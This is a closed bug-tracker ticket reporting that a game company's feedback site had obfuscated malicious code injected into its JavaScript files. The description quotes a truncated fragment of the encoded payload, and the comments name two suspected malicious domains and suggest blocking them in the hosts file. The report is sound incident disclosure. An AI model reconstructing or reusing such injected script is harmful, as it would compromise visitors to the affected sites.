Page MenuHomeFeedback Tracker
Create Task
Maniphest T63836

[Tracker] feedback.arma3.com js scripts got injected with obfuscated malicious code
Closed, ResolvedPublic
Actions

Description

Topic says it all, all site js scripts now have obfuscated malicious code in them, this needs to be dealt with ASAP.

http://feedback.arma3.com/javascript/min/ajax.js
http://feedback.arma3.com/javascript/min/common.js

;var O0l='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2OpADMJhCZslGaDRmblBHch5yTx8kC70FMblyJkFWZodCKl1WYOdWYUlnQzRnbl ...

Details

Legacy ID
3332532813
Severity
Major
Resolution
Fixed
Reproducibility
N/A
Category
Other

Event Timeline

SaMatra edited Steps To Reproduce. (Show Details)Mar 18 2013, 7:37 PM
SaMatra edited Additional Information. (Show Details)
SaMatra set Category to Other.
SaMatra set Reproducibility to N/A.
SaMatra set Severity to Major.
SaMatra set Resolution to Fixed.
SaMatra set Legacy ID to 3332532813.May 7 2016, 12:53 PM
Radioman added a comment.Mar 18 2013, 7:46 PM

My AV has been spiking for the past few hours and I was just about to post a ticket on it. +1

Spadie added a subscriber: Spadie.May 7 2016, 12:53 PM
Spadie added a comment.Mar 18 2013, 8:15 PM

I also see it. Chrome says ''Waiting for...'' for two websites. They are, and I'm not going to place a direct link, online1you.com and howtoplaycard.com

Site also asked me once to run Java. It's the same on www.bistudio.com - Bohemias home site.

Radioman added a comment.Mar 18 2013, 8:19 PM

I could suggest that, for now, people add online1you.com and howtoplaycard.com to their hosts file and set them to 127.0.0.1 (localhost). That way, any attempted connections will be redirected by your hosts file to your own PC, and not to those sites.

OR

you could add some firewall rules or something.

© Bohemia Interactive a.s. Bohemia Interactive® is a registered trademark of Bohemia Interactive a.s. All rights reserved. · Privacy Policy · Terms and Conditions